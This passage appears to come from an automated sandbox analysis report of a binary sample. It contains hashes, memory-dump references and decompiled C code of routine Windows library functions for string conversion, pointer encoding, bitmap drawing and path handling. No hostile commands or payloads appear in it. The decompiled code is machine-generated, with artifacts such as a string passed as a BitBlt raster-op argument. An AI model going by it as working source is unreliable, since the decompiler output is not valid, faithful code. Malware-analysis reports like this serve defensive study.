      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
      • String ID:
      • API String ID: 1641187343-0
      • Opcode ID: 1f48247ea89a5c653d1e89a18146b8271a3caf6e4b6b12f44f6c057735f503ca
      • Instruction ID: ad2c88204413c88489bb92cc6837eb972a4591b0a13b2beed6c2d6cc09a9a3a2
      • Opcode Fuzzy Hash: 1f48247ea89a5c653d1e89a18146b8271a3caf6e4b6b12f44f6c057735f503ca
      • Instruction Fuzzy Hash: 01E04F30600305ABEB70AFA8C606B8CB6E0BF51760F10492CF5D1EB2C0DB7089409725
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 86%
      			E009AFB60(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr _t22;
      				void* _t23;
      
      				_push(4);
      				E00AAD232(0xac885e, __ebx, __edi, __esi);
      				_t22 = __ecx;
      				 *((intOrPtr*)(_t23 - 0x10)) = __ecx;
      				E009A5D70(__ecx, __edx, E009B9D52());
      				 *(_t23 - 4) =  *(_t23 - 4) & 0x00000000;
      				if(E009AE87C( *((intOrPtr*)(_t23 + 8))) == 0) {
      					E009A6000(__edx, __edi,  *((intOrPtr*)(_t23 + 8))); // executed
      				}
      				return E00AAD30A(_t22);
      			}

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: H_prolog3
      • String ID:
      • API String ID: 431132790-0
      • Opcode ID: 76d454f83fe277bac2e3c0019a924a43a3576ad06aae503f1c91de9e7a6bef91
      • Instruction ID: 1366cb4ea1ebd65df6f83a8f1e7c36d22abfd009fef71475297d4c6a7d5d0060
      • Opcode Fuzzy Hash: 76d454f83fe277bac2e3c0019a924a43a3576ad06aae503f1c91de9e7a6bef91
      • Instruction Fuzzy Hash: EBE0CD7030052067DF067B64891275D35117F85700F404018F5465F2C2CF394F0187DE
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009A6C30(short* _a4, int _a8) {
      				int _t4;
      
      				_t4 = WideCharToMultiByte(3, 0, _a4, _a8, 0, 0, 0, 0); // executed
      				return _t4;
      			}

      APIs
      • WideCharToMultiByte.KERNELBASE(00000003,00000000,?,?,00000000,00000000,00000000,00000000,?,009A8E09,00000002,00000000,?,00000000,?,00000001), ref: 009A6C44
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharMultiWide
      • String ID:
      • API String ID: 626452242-0
      • Opcode ID: 64cbcaab814106b5dbf4594ce38bc029cdac8a0cc9e87c452cab16dae8c983d7
      • Instruction ID: 293e369c320787595af76d1f9a09884b39082db77f2a8f868903a6fba280efb7
      • Opcode Fuzzy Hash: 64cbcaab814106b5dbf4594ce38bc029cdac8a0cc9e87c452cab16dae8c983d7
      • Instruction Fuzzy Hash: 48C04CF6140108BFFB011ED19D05EB77B5DD784610F008015BE1DC5051D6729D119671
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 63%
      			E00AC64EE(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4) {
      				signed int _v0;
      				void* __ebp;
      				intOrPtr _t9;
      				void* _t10;
      				signed int _t12;
      				signed int _t16;
      				void* _t29;
      
      				_t26 = __esi;
      				_t22 = __edx;
      				if( *0xd0df08 != 0) {
      					 *0xd0df08 =  *0xd0df08 - 1; // executed
      					__eflags =  *0xd0df08;
      					__imp__EncodePointer(_a4);
      					_t16 =  *0xd0df08; // 0xa
      					 *((intOrPtr*)(0xd14590 + _t16 * 4)) = _t9;
      					return _t9;
      				} else {
      					_t10 = L00AB607A(_t9);
      					_t31 = _t10;
      					if(_t10 != 0) {
      						_push(0x16);
      						L00AB6087(__ebx, __edx, __edi, __esi, _t31);
      					}
      					if(( *0xd0cf18 & 0x00000002) != 0) {
      						E00AB4A12(_t22, _t26, 3, 0x40000015, 1);
      						_t29 = _t29 + 0xc;
      					}
      					E00AACBF2(3);
      					asm("int3");
      					_t12 =  *0xd0cf18;
      					 *0xd0cf18 =  !_a4 & _t12 | _v0 & _a4;
      					return _t12;
      				}
      			}

      APIs
      • RtlEncodePointer.NTDLL(00000004,?,00AC5BDD,00AC5B8C,?,00AC5E47,00000000,00000000,00000004,009A1A1F), ref: 00AC650B
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: EncodePointer
      • String ID:
      • API String ID: 2118026453-0
      • Opcode ID: ff1c4f2d287ead66b8d4a08e05ae9e06e19b4b8c277ff45eeab5ad6c36fc0bc9
      • Instruction ID: 5526bcca0edf559b5d2e98055862682297ab21861425ed8b1a2fc90694f7761d
      • Opcode Fuzzy Hash: ff1c4f2d287ead66b8d4a08e05ae9e06e19b4b8c277ff45eeab5ad6c36fc0bc9
      • Instruction Fuzzy Hash: 49D09E71005749EFDB00AF90F844F657F76E754355F118016D80F82761DB325491DA50
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E009BB072(void* __ecx) {
      				int _t3;
      				void* _t5;
      				void* _t7;
      
      				if( *((intOrPtr*)(__ecx + 4)) != 0) {
      					_t3 = DeleteObject(E009BB046(_t5, __ecx, _t7)); // executed
      					return _t3;
      				} else {
      					return 0;
      				}
      			}

      APIs
      • DeleteObject.GDI32(00000000), ref: 009BB081
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: DeleteObject
      • String ID:
      • API String ID: 1531683806-0
      • Opcode ID: 40cc3f995d0e0193f8460713920060afc4d66c1b1837eed0357e7cddd734101e
      • Instruction ID: 96d2e6cac32d5b92494cd9fd1c9630fc4685666da9d11a119cd45be4bec0ce4a
      • Opcode Fuzzy Hash: 40cc3f995d0e0193f8460713920060afc4d66c1b1837eed0357e7cddd734101e
      • Instruction Fuzzy Hash: EAB09270802100AACE20BB708A4877B77685B80326F008898A025C1099EBB9C0868500
      Uniqueness

      Uniqueness Score: -1.00%

      APIs
      • RtlEncodePointer.NTDLL(00000000,00AC0492,00D13BB8,00000314,00000000,?,?,?,?,?,00AB674F,00D13BB8,Microsoft Visual C++ Runtime Library,00012010), ref: 00AB4099
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: EncodePointer
      • String ID:
      • API String ID: 2118026453-0
      • Opcode ID: 6d090473fa8bc78d68b9a6dcbc272968f2b2be4f128a35dbab8f8cb2f67999ae
      • Instruction ID: 1c0e0778a53d6f441d37578345e0dade8d5af842cb2403fd2ad7861e4376146a
      • Opcode Fuzzy Hash: 6d090473fa8bc78d68b9a6dcbc272968f2b2be4f128a35dbab8f8cb2f67999ae
      • Instruction Fuzzy Hash:
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 87%
      			E00A539D2(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags, signed long long __fp0) {
      				void* _t140;
      				int _t143;
      				intOrPtr _t145;
      				struct HDC__* _t146;
      				signed int _t148;
      				intOrPtr _t152;
      				void* _t156;
      				intOrPtr _t160;
      				struct HDC__* _t161;
      				unsigned int _t163;
      				signed int _t165;
      				intOrPtr _t168;
      				signed int _t176;
      				int _t177;
      				signed int _t180;
      				int _t183;
      				signed int _t186;
      				int _t187;
      				signed char _t190;
      				signed int _t194;
      				signed int _t196;
      				signed int _t200;
      				signed char _t205;
      				signed int _t207;
      				signed char _t208;
      				void* _t214;
      				void* _t219;
      				void* _t224;
      				int _t231;
      				unsigned int _t232;
      				int _t235;
      				int _t237;
      				int _t239;
      				signed int _t241;
      				signed int _t261;
      				signed int _t263;
      				signed int _t265;
      				signed char _t266;
      				intOrPtr _t285;
      				int _t289;
      				void* _t291;
      				signed long long* _t292;
      				signed long long _t299;
      
      				_t299 = __fp0;
      				_t279 = __edx;
      				_push(0x48);
      				E00AAD232(0xacfa2a, __ebx, __edi, __esi);
      				_t285 = __ecx;
      				 *((intOrPtr*)(_t291 - 0x50)) = __ecx;
      				if( *(_t291 + 0x18) == 0x64) {
      					L59:
      					_t140 = 1;
      				} else {
      					_t143 =  *((intOrPtr*)(_t291 + 0x14)) -  *(_t291 + 0xc);
      					_t231 = 0;
      					 *(_t291 - 0x18) = _t143;
      					if(_t143 <= 0) {
      						goto L59;
      					} else {
      						_t289 =  *((intOrPtr*)(_t291 + 0x10)) -  *(_t291 + 8);
      						 *(_t291 - 0x54) = _t289;
      						if(_t289 <= 0) {
      							goto L59;
      						} else {
      							if( *0xd0ff5c > 8) {
      								__eflags =  *(_t291 + 0x24) - 0xffffffff;
      								if( *(_t291 + 0x24) == 0xffffffff) {
      									L8:
      									E009BA639(_t291 - 0x40);
      									_t145 =  *((intOrPtr*)(_t285 + 4));
      									 *(_t291 - 4) = _t231;
      									__eflags = _t145 - _t231;
      									if(_t145 != _t231) {
      										_t146 =  *(_t145 + 4);
      									} else {
      										_t146 = 0;
      									}
      									_t148 = E009BAD44(_t231, _t291 - 0x40, _t279, _t285, CreateCompatibleDC(_t146));
      									__eflags = _t148;
      									if(_t148 != 0) {
      										 *(_t291 - 0x20) = _t231;
      										 *((intOrPtr*)(_t291 - 0x24)) = 0xad7e64;
      										 *(_t291 - 4) = 1;
      										__eflags = E009BB018(_t231, _t291 - 0x24, _t279, _t285, CreateCompatibleBitmap( *( *((intOrPtr*)(_t285 + 4)) + 4), _t289,  *(_t291 - 0x18)));
      										if(__eflags != 0) {
      											_t152 = E009BB0A9( *(_t291 - 0x3c),  *(_t291 - 0x20));
      											__eflags = _t152 - _t231;
      											_t247 = 0 | __eflags != 0x00000000;
      											 *((intOrPtr*)(_t291 - 0x4c)) = _t152;
      											if(__eflags == 0) {
      												E009B8782(_t247);
      											}
      											 *(_t291 - 0x44) =  *(_t291 - 0x18);
      											 *(_t291 - 0x48) = _t289;
      											_t156 = E00A52BF6(_t291 - 0x48, _t291 - 0x10);
      											 *(_t291 - 0x44) = _t156;
      											__eflags = _t156 - _t231;
      											if(__eflags == 0) {
      												goto L14;
      											} else {
      												__eflags =  *(_t291 - 0x10) - _t231;
      												if(__eflags == 0) {
      													goto L14;
      												} else {
      													SelectObject( *(_t291 - 0x3c), _t156);
      													_t160 =  *((intOrPtr*)(_t285 + 4));
      													__eflags = _t160 - _t231;
      													if(_t160 != _t231) {
      														_t161 =  *(_t160 + 4);
      													} else {
      														_t161 = 0;
      													}
      													BitBlt( *(_t291 - 0x3c), _t231, _t231, _t289,  *(_t291 - 0x18), _t161,  *(_t291 + 8),  *(_t291 + 0xc), "singapore");
      													_t163 =  *(_t291 + 0x1c);
      													__eflags = _t163 - 0xffffffff;
      													if(_t163 != 0xffffffff) {
      														_t279 = (_t163 & 0x000000ff) << 8;
      														_t253 = (_t163 >> 0x00000008 & 0x000000ff | (_t163 & 0x000000ff) << 0x00000008) << 0x00000008 | _t163 >> 0x00000010 & 0x000000ff;
      														__eflags = _t253;
      														 *(_t291 + 0x1c) = _t253;
      													}
      													_t165 =  *(_t291 - 0x18) * _t289;
      													__eflags = _t165 - _t231;
      													if(_t165 > _t231) {
      														 *(_t291 - 0x2c) = _t165;
      														do {
      															__eflags =  *(_t291 + 0x20);
      															_t232 =  *( *(_t291 - 0x10));
      															if( *(_t291 + 0x20) <= 0) {
      																_t232 -  *(_t291 + 0x1c) = _t232 !=  *(_t291 + 0x1c);
      																if(_t232 !=  *(_t291 + 0x1c)) {
      																	goto L32;
      																}
      															} else {
      																_t214 = E00AAFF44(_t279, (_t232 & 0x000000ff) - ( *(_t291 + 0x1c) & 0x000000ff));
      																_pop(_t253);
      																__eflags = _t214 -  *(_t291 + 0x20);
      																if(_t214 >=  *(_t291 + 0x20)) {
      																	L32:
      																	__eflags =  *(_t291 + 0x18) - 0xffffffff;
      																	if( *(_t291 + 0x18) != 0xffffffff) {
      																		__eflags =  *(_t291 + 0x24) - 0xffffffff;
      																		if( *(_t291 + 0x24) != 0xffffffff) {
      																			_t176 = _t232 & 0x000000ff;
      																			 *(_t291 - 0x28) = _t232 >> 0x00000008 & 0x000000ff;
      																			 *(_t291 - 0x14) = _t232 >> 0x00000010 & 0x000000ff;
      																			_t235 = ( *(_t291 + 0x24) >> 0x00000010 & 0x000000ff) - _t176;
      																			 *(_t291 - 0x1c) = _t176;
      																			_t177 = MulDiv(_t235,  *(_t291 + 0x18), 0x64);
      																			__eflags = _t177 +  *(_t291 - 0x1c) - 0xff;
      																			if(_t177 +  *(_t291 - 0x1c) <= 0xff) {
      																				_t180 = MulDiv(_t235,  *(_t291 + 0x18), 0x64) +  *(_t291 - 0x1c);
      																				__eflags = _t180;
      																				 *(_t291 - 0x30) = _t180;
      																			} else {
      																				 *(_t291 - 0x30) = 0xff;
      																			}
      																			_t237 = ( *(_t291 + 0x24) >> 0x00000008 & 0x000000ff) -  *(_t291 - 0x28);
      																			_t183 = MulDiv(_t237,  *(_t291 + 0x18), 0x64);
      																			__eflags = _t183 +  *(_t291 - 0x28) - 0xff;
      																			if(_t183 +  *(_t291 - 0x28) <= 0xff) {
      																				_t186 = MulDiv(_t237,  *(_t291 + 0x18), 0x64) +  *(_t291 - 0x28);
      																				__eflags = _t186;
      																				 *(_t291 - 0x1c) = _t186;
      																			} else {
      																				 *(_t291 - 0x1c) = 0xff;
      																			}
      																			_t239 = ( *(_t291 + 0x24) & 0x000000ff) -  *(_t291 - 0x14);
      																			_t187 = MulDiv(_t239,  *(_t291 + 0x18), 0x64);
      																			__eflags = _t187 +  *(_t291 - 0x14) - 0xff;
      																			if(_t187 +  *(_t291 - 0x14) <= 0xff) {
      																				_t190 = MulDiv(_t239,  *(_t291 + 0x18), 0x64) +  *(_t291 - 0x14);
      																				__eflags = _t190;
      																			} else {
      																				_t190 = 0xff;
      																			}
      																			_t194 = (_t190 & 0x000000ff | 0xffffff00) << 0x00000008 |  *(_t291 - 0x1c) & 0x000000ff;
      																			__eflags = _t194;
      																			_t261 =  *(_t291 - 0x30) & 0x000000ff;
      																			goto L52;
      																		} else {
      																			asm("fild dword [ebp+0x18]");
      																			_t292 = _t292 - 0x18;
      																			_t299 = _t299 *  *0xae8828;
      																			asm("fst qword [esp+0x10]");
      																			asm("fst qword [esp+0x8]");
      																			 *_t292 = _t299;
      																			_push(_t232);
      																			_t196 = E00A52D86(_t253) | 0xff000000;
      																		}
      																	} else {
      																		asm("cdq");
      																		_t263 = 3;
      																		_t200 = (( *0xd0fdce & 0x000000ff) + (_t232 & 0x000000ff) * 2) / _t263;
      																		 *(_t291 - 0x14) = 0xff;
      																		__eflags = _t200 - 0xff;
      																		if(_t200 <= 0xff) {
      																			 *(_t291 - 0x14) = _t200;
      																		}
      																		asm("cdq");
      																		_t265 = 3;
      																		_t205 = (( *0xd0fdcd & 0x000000ff) + (_t232 >> 0x00000008 & 0x000000ff) * 2) / _t265;
      																		_t266 = 0xff;
      																		__eflags = _t205 - 0xff;
      																		if(_t205 <= 0xff) {
      																			_t266 = _t205;
      																		}
      																		_t207 = ( *0xd0fdcc & 0x000000ff) + (_t232 >> 0x00000010 & 0x000000ff) * 2;
      																		asm("cdq");
      																		_t241 = 3;
      																		_t208 = _t207 / _t241;
      																		_t279 = _t207 % _t241;
      																		__eflags = _t208 - 0xff;
      																		if(_t208 > 0xff) {
      																			_t208 = 0xff;
      																		}
      																		_t194 = (_t208 & 0x000000ff | 0xffffff00) << 0x00000008 | _t266 & 0x000000ff;
      																		_t261 =  *(_t291 - 0x14) & 0x000000ff;
      																		L52:
      																		_t196 = _t194 << 0x00000008 | _t261;
      																		__eflags = _t196;
      																	}
      																	_t253 =  *(_t291 - 0x10);
      																	 *( *(_t291 - 0x10)) = _t196;
      																} else {
      																	_t219 = E00AAFF44(_t279, (_t232 >> 0x00000008 & 0x000000ff) - ( *(_t291 + 0x1c) >> 0x00000008 & 0x000000ff));
      																	_pop(_t253);
      																	__eflags = _t219 -  *(_t291 + 0x20);
      																	if(_t219 >=  *(_t291 + 0x20)) {
      																		goto L32;
      																	} else {
      																		_t224 = E00AAFF44(_t279, (_t232 >> 0x00000010 & 0x000000ff) - ( *(_t291 + 0x1c) >> 0x00000010 & 0x000000ff));
      																		_pop(_t253);
      																		__eflags = _t224 -  *(_t291 + 0x20);
      																		if(_t224 >=  *(_t291 + 0x20)) {
      																			goto L32;
      																		}
      																	}
      																}
      															}
      															 *(_t291 - 0x10) =  &(( *(_t291 - 0x10))[1]);
      															_t117 = _t291 - 0x2c;
      															 *_t117 =  *(_t291 - 0x2c) - 1;
      															__eflags =  *_t117;
      														} while ( *_t117 != 0);
      														_t285 =  *((intOrPtr*)(_t291 - 0x50));
      														_t289 =  *(_t291 - 0x54);
      														_t231 = 0;
      														__eflags = 0;
      													}
      													BitBlt( *( *((intOrPtr*)(_t285 + 4)) + 4),  *(_t291 + 8),  *(_t291 + 0xc), _t289,  *(_t291 - 0x18),  *(_t291 - 0x3c), _t231, _t231, "singapore");
      													_t168 =  *((intOrPtr*)(_t291 - 0x4c));
      													__eflags = _t168 - _t231;
      													if(__eflags != 0) {
      														_t231 =  *(_t168 + 4);
      													}
      													E009BB0A9( *(_t291 - 0x3c), _t231);
      													DeleteObject( *(_t291 - 0x44));
      													 *(_t291 - 4) = 0;
      													 *((intOrPtr*)(_t291 - 0x24)) = 0xad7e64;
      													E009A93B2(_t231, _t291 - 0x24, _t285, _t289, __eflags);
      													_t134 = _t291 - 4;
      													 *_t134 =  *(_t291 - 4) | 0xffffffff;
      													__eflags =  *_t134;
      													E009BADC5(_t291 - 0x40);
      													goto L59;
      												}
      											}
      										} else {
      											L14:
      											 *(_t291 - 4) = 0;
      											 *((intOrPtr*)(_t291 - 0x24)) = 0xad7e64;
      											E009A93B2(_t231, _t291 - 0x24, _t285, _t289, __eflags);
      											goto L12;
      										}
      									} else {
      										L12:
      										 *(_t291 - 4) =  *(_t291 - 4) | 0xffffffff;
      										E009BADC5(_t291 - 0x40);
      										goto L7;
      									}
      								} else {
      									__eflags =  *(_t291 + 0x18) - 0x64;
      									if( *(_t291 + 0x18) <= 0x64) {
      										goto L8;
      									} else {
      										L7:
      										_t140 = 0;
      									}
      								}
      							} else {
      								E00A379BD( *((intOrPtr*)(__ecx + 4)), _t291 + 8);
      								goto L59;
      							}
      						}
      					}
      				}
      				return E00AAD30A(_t140);
      			}

      APIs
      • __EH_prolog3.LIBCMT ref: 00A539D9
        • Part of subcall function 00A379BD: FillRect.USER32 ref: 00A379D1
      Strings
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: FillH_prolog3Rect
      • String ID: d$singapore
      • API String ID: 1863035756-2851686393
      • Opcode ID: b5c732a31753ed1c39c44049789de30364ba3a59c12fe97ed6b08d635b0114ba
      • Instruction ID: 587400bea589fb5e4f146720632fbd0666f38cb3c2c2b5e8edcde2f211b934ab
      • Opcode Fuzzy Hash: b5c732a31753ed1c39c44049789de30364ba3a59c12fe97ed6b08d635b0114ba
      • Instruction Fuzzy Hash: 1EC1C1729002199FCF14DFA8CD819EEBBB0FF88392F104529F951E6291C735DA59DBA0
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 98%
      			E009C8B98(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				CHAR* _t45;
      				long _t46;
      				CHAR* _t51;
      				void* _t58;
      				int _t64;
      				intOrPtr _t76;
      				void* _t89;
      				void* _t92;
      				CHAR* _t94;
      				long _t96;
      				void* _t97;
      				CHAR* _t102;
      				CHAR* _t104;
      
      				_t92 = __edx;
      				_push(0x158);
      				E00AAD29B(0xac9aca, __ebx, __edi, __esi);
      				_t94 =  *(_t97 + 8);
      				_t45 =  *(_t97 + 0xc);
      				_t76 =  *((intOrPtr*)(_t97 + 0x10));
      				_t102 = _t94;
      				_t78 = 0 | _t102 != 0x00000000;
      				 *(_t97 - 0x158) = _t45;
      				if(_t102 != 0) {
      					L2:
      					_t104 = _t45;
      					_t78 = 0 | _t104 != 0x00000000;
      					if(_t104 != 0) {
      						goto L1;
      					}
      					_t80 = _t97 - 0x15c;
      					_t96 = 0x104;
      					_t46 = GetFullPathNameA(_t45, 0x104, _t94, _t97 - 0x15c);
      					if(_t46 != 0) {
      						if(_t46 < 0x104) {
      							E009A5D70(_t97 - 0x154, _t92, E009B9D52());
      							 *(_t97 - 4) =  *(_t97 - 4) & 0x00000000;
      							E009C89F5(_t76, _t92, _t94, _t97 - 0x154);
      							_t51 = PathIsUNCA( *(_t97 - 0x154));
      							if(_t51 != 0) {
      								L21:
      								E009A5510( &(( *(_t97 - 0x154))[0xfffffffffffffff0]), _t92);
      								goto L22;
      							}
      							if(GetVolumeInformationA( *(_t97 - 0x154), _t51, _t51, _t51, _t97 - 0x164, _t97 - 0x160, _t51, _t51) != 0) {
      								if(( *(_t97 - 0x160) & 0x00000002) == 0) {
      									CharUpperA(_t94);
      								}
      								if(( *(_t97 - 0x160) & 0x00000004) != 0) {
      									goto L21;
      								} else {
      									_t58 = FindFirstFileA( *(_t97 - 0x158), _t97 - 0x150);
      									if(_t58 == 0xffffffff) {
      										goto L21;
      									}
      									FindClose(_t58);
      									if( *(_t97 - 0x15c) == 0 ||  *(_t97 - 0x15c) <= _t94) {
      										goto L11;
      									} else {
      										_t64 = lstrlenA(_t97 - 0x124);
      										_t89 =  *(_t97 - 0x15c) - _t94;
      										if(_t64 + _t89 >= _t96) {
      											if(_t76 != 0) {
      												 *((intOrPtr*)(_t76 + 8)) = 3;
      												E009A6000(_t92, _t94,  *(_t97 - 0x158));
      											}
      											L12:
      											E009A5510( &(( *(_t97 - 0x154))[0xfffffffffffffff0]), _t92);
      											goto L5;
      										}
      										E009A6677(_t89, E00AAF201( *(_t97 - 0x15c), _t96, _t97 - 0x124));
      										goto L21;
      									}
      								}
      							}
      							L11:
      							E009C8B69(_t92, _t94, _t76,  *(_t97 - 0x158));
      							goto L12;
      						}
      						if(_t76 != 0) {
      							 *((intOrPtr*)(_t76 + 8)) = 3;
      							E009A6000(_t92, _t94,  *(_t97 - 0x158));
      						}
      						goto L5;
      					} else {
      						E009A6677(_t80, E00AAF0A3(_t94, 0x104,  *(_t97 - 0x158), 0xffffffff));
      						E009C8B69(_t92, _t94, _t76,  *(_t97 - 0x158));
      						L5:
      						L22:
      						return E00AAD31E(_t76, _t94, _t96);
      					}
      				}
      				L1:
      				_t45 = E009B8782(_t78);
      				goto L2;
      			}

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009C8BA2
      • GetFullPathNameA.KERNEL32(00000000,00000104,?,?,00000158,009C8D7B,?,00000104,00000000,?,009D29EA,?,?), ref: 009C8BE0
      • __cftof.LIBCMT ref: 009C8BF4
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      • PathIsUNCA.SHLWAPI(?,?,?,00000000,?,009D29EA,?,?,?,?,?,?), ref: 009C8C5C
      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000,?,009D29EA,?,?,?,?,?,?), ref: 009C8C83
      • CharUpperA.USER32(?), ref: 009C8CB6
